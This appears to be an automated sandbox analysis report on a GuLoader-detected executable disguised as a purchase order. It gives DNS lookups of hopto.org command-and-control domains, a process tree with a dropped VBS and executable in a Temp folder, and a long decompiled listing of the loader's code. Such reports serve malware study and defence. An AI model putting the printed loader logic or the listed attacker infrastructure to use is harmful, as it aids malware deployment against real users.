Apr 15, 2021 21:39:29.565331936 CEST	8.8.8.8	192.168.2.7	0x96b3	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:31.922386885 CEST	8.8.8.8	192.168.2.7	0xe0c1	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:33.271392107 CEST	8.8.8.8	192.168.2.7	0x3d8e	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:35.614804029 CEST	8.8.8.8	192.168.2.7	0x91ca	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:36.951955080 CEST	8.8.8.8	192.168.2.7	0xc874	No error (0)	micheal3m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)
Apr 15, 2021 21:39:39.291035891 CEST	8.8.8.8	192.168.2.7	0xdf46	No error (0)	sheilabeltagy4m.hopto.org		79.134.225.124	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: SBG-1100319PurchaseOrder.exe PID: 6224 Parent PID: 5840

General

Start time:	21:37:29
Start date:	15/04/2021
Path:	C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe'
Imagebase:	0x400000
File size:	204800 bytes
MD5 hash:	2DD62D78B9F7E9C5529502E085B55756
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: SBG-1100319PurchaseOrder.exe PID: 6352 Parent PID: 6224

General

Start time:	21:37:37
Start date:	15/04/2021
Path:	C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe'
Imagebase:	0x400000
File size:	204800 bytes
MD5 hash:	2DD62D78B9F7E9C5529502E085B55756
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000002.00000002.501532840.0000000000562000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: wscript.exe PID: 7152 Parent PID: 3292

General

Start time:	21:37:56
Start date:	15/04/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.vbs'
Imagebase:	0x7ff667170000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: filename1.exe PID: 5936 Parent PID: 7152

General

Start time:	21:37:57
Start date:	15/04/2021
Path:	C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe
Imagebase:	0x400000
File size:	204800 bytes
MD5 hash:	2DD62D78B9F7E9C5529502E085B55756
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: filename1.exe PID: 5516 Parent PID: 5936

General

Start time:	21:38:09
Start date:	15/04/2021
Path:	C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe
Imagebase:	0x400000
File size:	204800 bytes
MD5 hash:	2DD62D78B9F7E9C5529502E085B55756
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: SBG-1100319PurchaseOrder.exe PID: 6224 Parent PID: 5840 SBG-1100319PurchaseOrder.exeCOMMON

Executed Functions

Function 00418EC8, Relevance: 211.2, APIs: 116, Strings: 4, Instructions: 1209
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00418EC8(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				short _v32;
				char _v36;
				void* _v40;
				intOrPtr _v44;
				void* _v48;
				void* _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v72;
				char _v80;
				char _v96;
				intOrPtr _v104;
				char _v112;
				void* _v116;
				char _v120;
				void* _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				intOrPtr* _v144;
				signed int _v148;
				signed int _v152;
				intOrPtr* _v156;
				signed int _v160;
				intOrPtr* _v164;
				signed int _v168;
				intOrPtr* _v172;
				signed int _v176;
				intOrPtr* _v180;
				signed int _v184;
				intOrPtr* _v188;
				signed int _v192;
				intOrPtr* _v196;
				signed int _v200;
				intOrPtr* _v204;
				signed int _v208;
				intOrPtr* _v212;
				signed int _v216;
				intOrPtr* _v220;
				signed int _v224;
				intOrPtr* _v228;
				signed int _v232;
				intOrPtr* _v236;
				signed int _v240;
				intOrPtr* _v244;
				signed int _v248;
				intOrPtr* _v252;
				signed int _v256;
				intOrPtr* _v260;
				signed int _v264;
				intOrPtr* _v268;
				signed int _v272;
				intOrPtr* _v276;
				signed int _v280;
				intOrPtr* _v284;
				signed int _v288;
				intOrPtr* _v292;
				signed int _v296;
				signed int _t644;
				char* _t649;
				signed int _t661;
				signed int _t666;
				char* _t673;
				signed int _t677;
				char* _t678;
				char* _t684;
				signed int _t688;
				char* _t698;
				signed int _t702;
				char* _t709;
				signed int _t713;
				char* _t723;
				signed int _t727;
				char* _t734;
				signed int _t738;
				char* _t739;
				char* _t745;
				signed int _t749;
				char* _t759;
				signed int _t763;
				char* _t773;
				signed int _t777;
				char* _t778;
				char* _t787;
				signed int _t791;
				char* _t804;
				signed int _t808;
				char* _t818;
				signed int _t822;
				char* _t829;
				signed int _t833;
				char* _t843;
				signed int _t847;
				char* _t866;
				signed int _t870;
				char* _t883;
				signed int _t887;
				char* _t897;
				signed int _t901;
				char* _t909;
				signed int _t913;
				void* _t940;
				void* _t943;
				void* _t948;
				void* _t954;
				void* _t957;
				void* _t962;
				void* _t975;
				void* _t978;
				void* _t983;
				void* _t986;
				void* _t995;
				void* _t1000;
				void* _t1003;
				void* _t1005;
				void* _t1010;
				void* _t1013;
				void* _t1018;
				void* _t1024;
				void* _t1027;
				void* _t1032;
				void* _t1035;
				void* _t1037;
				void* _t1039;
				void* _t1041;
				void* _t1046;
				void* _t1049;
				void* _t1051;
				void* _t1056;
				void* _t1059;
				void* _t1064;
				void* _t1085;
				void* _t1089;
				intOrPtr _t1106;

				_push(0x401576);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t1106;
				L00401570();
				_v12 = _t1106;
				_v8 = 0x4012e0;
				L0040173E();
				_v104 = 0x80020004;
				_v112 = 0xa;
				_t644 = 0x10;
				L00401570();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Prokuraen");
				_push(L"Regimentsstabes");
				_push(L"flyveledere"); // executed
				L00401708(); // executed
				L00401744();
				_push(0x114);
				_push(0);
				L0040170E();
				asm("sbb eax, eax");
				_v124 =  ~( ~( ~_t644));
				L00401720();
				if(_v124 != 0) {
					_push(0);
					_push(0);
					_push(1);
					L00401702();
					L00401744();
					_v72 = 1;
					_v80 = 2;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_push( &_v80);
					L004016FC();
					L00401744();
					L00401726();
					L004016F6();
					_v72 = 2;
					_v80 = 2;
					_push( &_v80);
					_push( &_v96);
					L004016F0();
					_push( &_v96);
					L0040171A();
					L00401744();
					_push( &_v96);
					_push( &_v80);
					_push(2);
					L004016EA();
					if( *0x43033c != 0) {
						_v144 = 0x43033c;
					} else {
						_push(0x43033c);
						_push(0x4041c8);
						L0040175C();
						_v144 = 0x43033c;
					}
					_v124 =  *_v144;
					_t661 =  *((intOrPtr*)( *_v124 + 0x14))(_v124,  &_v60);
					asm("fclex");
					_v128 = _t661;
					if(_v128 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x4041b8);
						_push(_v124);
						_push(_v128);
						L00401756();
						_v148 = _t661;
					}
					_v132 = _v60;
					_t666 =  *((intOrPtr*)( *_v132 + 0xc0))(_v132,  &_v116);
					asm("fclex");
					_v136 = _t666;
					if(_v136 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0xc0);
						_push(0x4041d8);
						_push(_v132);
						_push(_v136);
						L00401756();
						_v152 = _t666;
					}
					_v32 = _v116;
					L00401750();
					_v72 = 0x80020004;
					_v80 = 0xa;
					_push( &_v80);
					L004016E4();
					L00401726();
					_push(0);
					_push(0x20);
					_push(1);
					_push(3);
					_push( &_v36);
					_push(4);
					_push(0x80);
					L004016DE();
					if( *0x430010 != 0) {
						_v156 = 0x430010;
					} else {
						_push(0x430010);
						_push(0x40516c);
						L0040175C();
						_v156 = 0x430010;
					}
					_t673 =  &_v60;
					L00401762();
					_v124 = _t673;
					_t677 =  *((intOrPtr*)( *_v124 + 0x120))(_v124,  &_v64, _t673,  *((intOrPtr*)( *((intOrPtr*)( *_v156)) + 0x420))( *_v156));
					asm("fclex");
					_v128 = _t677;
					if(_v128 >= 0) {
						_v160 = _v160 & 0x00000000;
					} else {
						_push(0x120);
						_push(0x403e40);
						_push(_v124);
						_push(_v128);
						L00401756();
						_v160 = _t677;
					}
					_push(0);
					_push(0);
					_push(_v64);
					_t678 =  &_v80;
					_push(_t678);
					L0040174A();
					_push(_t678);
					L00401738();
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (0 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = _t678;
					_push( &_v64);
					_push( &_v60);
					_push(2);
					L0040172C();
					L00401726();
					if( *0x430010 != 0) {
						_v164 = 0x430010;
					} else {
						_push(0x430010);
						_push(0x40516c);
						L0040175C();
						_v164 = 0x430010;
					}
					_t684 =  &_v60;
					L00401762();
					_v124 = _t684;
					_t688 =  *((intOrPtr*)( *_v124 + 0x68))(_v124,  &_v120, _t684,  *((intOrPtr*)( *((intOrPtr*)( *_v164)) + 0x37c))( *_v164));
					asm("fclex");
					_v128 = _t688;
					if(_v128 >= 0) {
						_v168 = _v168 & 0x00000000;
					} else {
						_push(0x68);
						_push(0x403e40);
						_push(_v124);
						_push(_v128);
						L00401756();
						_v168 = _t688;
					}
					_t940 = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t940 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = _v120;
					L00401750();
					_t943 = 2;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t943 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = 0x161b9b;
					if( *0x430010 != 0) {
						_v172 = 0x430010;
					} else {
						_push(0x430010);
						_push(0x40516c);
						L0040175C();
						_v172 = 0x430010;
					}
					_t698 =  &_v60;
					L00401762();
					_v124 = _t698;
					_t702 =  *((intOrPtr*)( *_v124 + 0x138))(_v124,  &_v120, _t698,  *((intOrPtr*)( *((intOrPtr*)( *_v172)) + 0x304))( *_v172));
					asm("fclex");
					_v128 = _t702;
					if(_v128 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x138);
						_push(0x403e84);
						_push(_v124);
						_push(_v128);
						L00401756();
						_v176 = _t702;
					}
					_t948 = 3;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t948 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = _v120;
					L00401750();
					if( *0x430010 != 0) {
						_v180 = 0x430010;
					} else {
						_push(0x430010);
						_push(0x40516c);
						L0040175C();
						_v180 = 0x430010;
					}
					_t709 =  &_v60;
					L00401762();
					_v124 = _t709;
					_t713 =  *((intOrPtr*)( *_v124 + 0x60))(_v124,  &_v120, _t709,  *((intOrPtr*)( *((intOrPtr*)( *_v180)) + 0x308))( *_v180));
					asm("fclex");
					_v128 = _t713;
					if(_v128 >= 0) {
						_v184 = _v184 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x403f1c);
						_push(_v124);
						_push(_v128);
						L00401756();
						_v184 = _t713;
					}
					_t954 = 4;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t954 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = _v120;
					L00401750();
					_t957 = 5;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t957 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = 0x8571e5;
					if( *0x430010 != 0) {
						_v188 = 0x430010;
					} else {
						_push(0x430010);
						_push(0x40516c);
						L0040175C();
						_v188 = 0x430010;
					}
					_t723 =  &_v60;
					L00401762();
					_v124 = _t723;
					_t727 =  *((intOrPtr*)( *_v124 + 0x68))(_v124,  &_v120, _t723,  *((intOrPtr*)( *((intOrPtr*)( *_v188)) + 0x454))( *_v188));
					asm("fclex");
					_v128 = _t727;
					if(_v128 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x68);
						_push(0x403e40);
						_push(_v124);
						_push(_v128);
						L00401756();
						_v192 = _t727;
					}
					_t962 = 6;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t962 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = _v120;
					L00401750();
					if( *0x430010 != 0) {
						_v196 = 0x430010;
					} else {
						_push(0x430010);
						_push(0x40516c);
						L0040175C();
						_v196 = 0x430010;
					}
					_t734 =  &_v60;
					L00401762();
					_v124 = _t734;
					_t738 =  *((intOrPtr*)( *_v124 + 0x120))(_v124,  &_v64, _t734,  *((intOrPtr*)( *((intOrPtr*)( *_v196)) + 0x4cc))( *_v196));
					asm("fclex");
					_v128 = _t738;
					if(_v128 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0x120);
						_push(0x403e40);
						_push(_v124);
						_push(_v128);
						L00401756();
						_v200 = _t738;
					}
					_push(0);
					_push(0);
					_push(_v64);
					_t739 =  &_v80;
					_push(_t739);
					L0040174A();
					_push(_t739);
					L00401738();
					_t1085 = 7;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t1085 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = _t739;
					_push( &_v64);
					_push( &_v60);
					_push(2);
					L0040172C();
					L00401726();
					if( *0x430010 != 0) {
						_v204 = 0x430010;
					} else {
						_push(0x430010);
						_push(0x40516c);
						L0040175C();
						_v204 = 0x430010;
					}
					_t745 =  &_v60;
					L00401762();
					_v124 = _t745;
					_t749 =  *((intOrPtr*)( *_v124 + 0x178))(_v124,  &_v120, _t745,  *((intOrPtr*)( *((intOrPtr*)( *_v204)) + 0x3e8))( *_v204));
					asm("fclex");
					_v128 = _t749;
					if(_v128 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0x178);
						_push(0x403e40);
						_push(_v124);
						_push(_v128);
						L00401756();
						_v208 = _t749;
					}
					_t975 = 8;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t975 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = _v120;
					L00401750();
					_t978 = 9;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t978 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = 0x37302e;
					if( *0x430010 != 0) {
						_v212 = 0x430010;
					} else {
						_push(0x430010);
						_push(0x40516c);
						L0040175C();
						_v212 = 0x430010;
					}
					_t759 =  &_v60;
					L00401762();
					_v124 = _t759;
					_t763 =  *((intOrPtr*)( *_v124 + 0x60))(_v124,  &_v120, _t759,  *((intOrPtr*)( *((intOrPtr*)( *_v212)) + 0x3e0))( *_v212));
					asm("fclex");
					_v128 = _t763;
					if(_v128 >= 0) {
						_v216 = _v216 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x403e40);
						_push(_v124);
						_push(_v128);
						L00401756();
						_v216 = _t763;
					}
					_t983 = 0xa;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t983 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = _v120;
					L00401750();
					_t986 = 0xb;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t986 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = 0x59f4dc;
					if( *0x430010 != 0) {
						_v220 = 0x430010;
					} else {
						_push(0x430010);
						_push(0x40516c);
						L0040175C();
						_v220 = 0x430010;
					}
					_t773 =  &_v60;
					L00401762();
					_v124 = _t773;
					_t777 =  *((intOrPtr*)( *_v124 + 0x120))(_v124,  &_v64, _t773,  *((intOrPtr*)( *((intOrPtr*)( *_v220)) + 0x380))( *_v220));
					asm("fclex");
					_v128 = _t777;
					if(_v128 >= 0) {
						_v224 = _v224 & 0x00000000;
					} else {
						_push(0x120);
						_push(0x403e40);
						_push(_v124);
						_push(_v128);
						L00401756();
						_v224 = _t777;
					}
					_push(0);
					_push(0);
					_push(_v64);
					_t778 =  &_v80;
					_push(_t778);
					L0040174A();
					_push(_t778);
					L00401738();
					_t1089 = 0xc;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t1089 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = _t778;
					_push( &_v64);
					_push( &_v60);
					_push(2);
					L0040172C();
					L00401726();
					_t995 = 0xd;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t995 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = 0x80367b;
					if( *0x430010 != 0) {
						_v228 = 0x430010;
					} else {
						_push(0x430010);
						_push(0x40516c);
						L0040175C();
						_v228 = 0x430010;
					}
					_t787 =  &_v60;
					L00401762();
					_v124 = _t787;
					_t791 =  *((intOrPtr*)( *_v124 + 0x178))(_v124,  &_v120, _t787,  *((intOrPtr*)( *((intOrPtr*)( *_v228)) + 0x380))( *_v228));
					asm("fclex");
					_v128 = _t791;
					if(_v128 >= 0) {
						_v232 = _v232 & 0x00000000;
					} else {
						_push(0x178);
						_push(0x403e40);
						_push(_v124);
						_push(_v128);
						L00401756();
						_v232 = _t791;
					}
					_t1000 = 0xe;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t1000 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = _v120;
					L00401750();
					_t1003 = 0xf;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t1003 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = 0x4b944;
					_t1005 = 0x10;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t1005 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = 0x7ad647;
					if( *0x430010 != 0) {
						_v236 = 0x430010;
					} else {
						_push(0x430010);
						_push(0x40516c);
						L0040175C();
						_v236 = 0x430010;
					}
					_t804 =  &_v60;
					L00401762();
					_v124 = _t804;
					_t808 =  *((intOrPtr*)( *_v124 + 0x178))(_v124,  &_v120, _t804,  *((intOrPtr*)( *((intOrPtr*)( *_v236)) + 0x3dc))( *_v236));
					asm("fclex");
					_v128 = _t808;
					if(_v128 >= 0) {
						_v240 = _v240 & 0x00000000;
					} else {
						_push(0x178);
						_push(0x403e40);
						_push(_v124);
						_push(_v128);
						L00401756();
						_v240 = _t808;
					}
					_t1010 = 0x11;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t1010 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = _v120;
					L00401750();
					_t1013 = 0x12;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t1013 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = 0x870545;
					if( *0x430010 != 0) {
						_v244 = 0x430010;
					} else {
						_push(0x430010);
						_push(0x40516c);
						L0040175C();
						_v244 = 0x430010;
					}
					_t818 =  &_v60;
					L00401762();
					_v124 = _t818;
					_t822 =  *((intOrPtr*)( *_v124 + 0x178))(_v124,  &_v120, _t818,  *((intOrPtr*)( *((intOrPtr*)( *_v244)) + 0x498))( *_v244));
					asm("fclex");
					_v128 = _t822;
					if(_v128 >= 0) {
						_v248 = _v248 & 0x00000000;
					} else {
						_push(0x178);
						_push(0x403e40);
						_push(_v124);
						_push(_v128);
						L00401756();
						_v248 = _t822;
					}
					_t1018 = 0x13;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t1018 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = _v120;
					L00401750();
					if( *0x430010 != 0) {
						_v252 = 0x430010;
					} else {
						_push(0x430010);
						_push(0x40516c);
						L0040175C();
						_v252 = 0x430010;
					}
					_t829 =  &_v60;
					L00401762();
					_v124 = _t829;
					_t833 =  *((intOrPtr*)( *_v124 + 0x60))(_v124,  &_v120, _t829,  *((intOrPtr*)( *((intOrPtr*)( *_v252)) + 0x400))( *_v252));
					asm("fclex");
					_v128 = _t833;
					if(_v128 >= 0) {
						_v256 = _v256 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x403e40);
						_push(_v124);
						_push(_v128);
						L00401756();
						_v256 = _t833;
					}
					_t1024 = 0x14;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t1024 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = _v120;
					L00401750();
					_t1027 = 0x15;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t1027 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = 0x7afb12;
					if( *0x430010 != 0) {
						_v260 = 0x430010;
					} else {
						_push(0x430010);
						_push(0x40516c);
						L0040175C();
						_v260 = 0x430010;
					}
					_t843 =  &_v60;
					L00401762();
					_v124 = _t843;
					_t847 =  *((intOrPtr*)( *_v124 + 0x68))(_v124,  &_v120, _t843,  *((intOrPtr*)( *((intOrPtr*)( *_v260)) + 0x49c))( *_v260));
					asm("fclex");
					_v128 = _t847;
					if(_v128 >= 0) {
						_v264 = _v264 & 0x00000000;
					} else {
						_push(0x68);
						_push(0x403e40);
						_push(_v124);
						_push(_v128);
						L00401756();
						_v264 = _t847;
					}
					_t1032 = 0x16;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t1032 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = _v120;
					L00401750();
					_t1035 = 0x17;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t1035 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = 0xd719e;
					_t1037 = 0x18;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t1037 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = 0x75eee2;
					_t1039 = 0x19;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t1039 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = 0x3e109;
					_t1041 = 0x1a;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t1041 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = 0xddffa;
					if( *0x430010 != 0) {
						_v268 = 0x430010;
					} else {
						_push(0x430010);
						_push(0x40516c);
						L0040175C();
						_v268 = 0x430010;
					}
					_t866 =  &_v60;
					L00401762();
					_v124 = _t866;
					_t870 =  *((intOrPtr*)( *_v124 + 0x60))(_v124,  &_v120, _t866,  *((intOrPtr*)( *((intOrPtr*)( *_v268)) + 0x470))( *_v268));
					asm("fclex");
					_v128 = _t870;
					if(_v128 >= 0) {
						_v272 = _v272 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x403e40);
						_push(_v124);
						_push(_v128);
						L00401756();
						_v272 = _t870;
					}
					_t1046 = 0x1b;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t1046 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = _v120;
					L00401750();
					_t1049 = 0x1c;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t1049 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = 0x2e6977;
					_t1051 = 0x1d;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t1051 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = 0xeeac073d;
					if( *0x430010 != 0) {
						_v276 = 0x430010;
					} else {
						_push(0x430010);
						_push(0x40516c);
						L0040175C();
						_v276 = 0x430010;
					}
					_t883 =  &_v60;
					L00401762();
					_v124 = _t883;
					_t887 =  *((intOrPtr*)( *_v124 + 0x178))(_v124,  &_v120, _t883,  *((intOrPtr*)( *((intOrPtr*)( *_v276)) + 0x3c8))( *_v276));
					asm("fclex");
					_v128 = _t887;
					if(_v128 >= 0) {
						_v280 = _v280 & 0x00000000;
					} else {
						_push(0x178);
						_push(0x403e40);
						_push(_v124);
						_push(_v128);
						L00401756();
						_v280 = _t887;
					}
					_t1056 = 0x1e;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t1056 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = _v120;
					L00401750();
					_t1059 = 0x1f;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t1059 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = 0x1629f9;
					if( *0x430010 != 0) {
						_v284 = 0x430010;
					} else {
						_push(0x430010);
						_push(0x40516c);
						L0040175C();
						_v284 = 0x430010;
					}
					_t897 =  &_v60;
					L00401762();
					_v124 = _t897;
					_t901 =  *((intOrPtr*)( *_v124 + 0x68))(_v124,  &_v120, _t897,  *((intOrPtr*)( *((intOrPtr*)( *_v284)) + 0x42c))( *_v284));
					asm("fclex");
					_v128 = _t901;
					if(_v128 >= 0) {
						_v288 = _v288 & 0x00000000;
					} else {
						_push(0x68);
						_push(0x403e40);
						_push(_v124);
						_push(_v128);
						L00401756();
						_v288 = _t901;
					}
					_t1064 = 0x20;
					 *((intOrPtr*)( *((intOrPtr*)(_v36 + 0xc)) + (_t1064 -  *((intOrPtr*)(_v36 + 0x14))) * 4)) = _v120;
					L00401750();
					_v72 = 1;
					_v80 = 2;
					_push(0);
					_push( &_v80);
					L004016D8();
					L00401744();
					L00401726();
					if( *0x430010 != 0) {
						_v292 = 0x430010;
					} else {
						_push(0x430010);
						_push(0x40516c);
						L0040175C();
						_v292 = 0x430010;
					}
					_t909 =  &_v60;
					L00401762();
					_v124 = _t909;
					_t913 =  *((intOrPtr*)( *_v124 + 0x198))(_v124,  &_v56, _t909,  *((intOrPtr*)( *((intOrPtr*)( *_v292)) + 0x4c0))( *_v292));
					asm("fclex");
					_v128 = _t913;
					if(_v128 >= 0) {
						_v296 = _v296 & 0x00000000;
					} else {
						_push(0x198);
						_push(0x403e40);
						_push(_v124);
						_push(_v128);
						L00401756();
						_v296 = _t913;
					}
					_push(_v56);
					_push(0x6c);
					_push(0xffffffff);
					_push(0x20);
					L004016D2();
					L00401720();
					L00401750();
				}
				_v44 = 0x4fe746;
				_push(0x419fc6);
				L00401720();
				L00401720();
				_t649 =  &_v36;
				_push(_t649);
				_push(0);
				L004016CC();
				L00401720();
				L00401720();
				L00401720();
				return _t649;
			}

0x00418ecd
0x00418ed8
0x00418ed9
0x00418ee5
0x00418eed
0x00418ef0
0x00418efd
0x00418f02
0x00418f09
0x00418f12
0x00418f13
0x00418f1d
0x00418f1e
0x00418f1f
0x00418f20
0x00418f21
0x00418f26
0x00418f2b
0x00418f30
0x00418f3a
0x00418f3f
0x00418f40
0x00418f42
0x00418f49
0x00418f4f
0x00418f56
0x00418f61
0x00418f67
0x00418f69
0x00418f6b
0x00418f6d
0x00418f77
0x00418f7c
0x00418f83
0x00418f8a
0x00418f8c
0x00418f8e
0x00418f90
0x00418f95
0x00418f96
0x00418fa0
0x00418fa8
0x00418fad
0x00418fb2
0x00418fb9
0x00418fc3
0x00418fc7
0x00418fc8
0x00418fd0
0x00418fd1
0x00418fdb
0x00418fe3
0x00418fe7
0x00418fe8
0x00418fea
0x00418ff9
0x00419016
0x00418ffb
0x00418ffb
0x00419000
0x00419005
0x0041900a
0x0041900a
0x00419028
0x00419037
0x0041903a
0x0041903c
0x00419043
0x0041905f
0x00419045
0x00419045
0x00419047
0x0041904c
0x0041904f
0x00419052
0x00419057
0x00419057
0x00419069
0x00419078
0x0041907e
0x00419080
0x0041908d
0x004190af
0x0041908f
0x0041908f
0x00419094
0x00419099
0x0041909c
0x004190a2
0x004190a7
0x004190a7
0x004190ba
0x004190c1
0x004190c6
0x004190cd
0x004190d7
0x004190d8
0x004190e0
0x004190e5
0x004190e7
0x004190e9
0x004190eb
0x004190f0
0x004190f1
0x004190f3
0x004190f8
0x00419107
0x00419124
0x00419109
0x00419109
0x0041910e
0x00419113
0x00419118
0x00419118
0x00419148
0x0041914c
0x00419151
0x00419160
0x00419166
0x00419168
0x0041916f
0x0041918e
0x00419171
0x00419171
0x00419176
0x0041917b
0x0041917e
0x00419181
0x00419186
0x00419186
0x00419195
0x00419197
0x00419199
0x0041919c
0x0041919f
0x004191a0
0x004191a8
0x004191a9
0x004191bc
0x004191c2
0x004191c6
0x004191c7
0x004191c9
0x004191d4
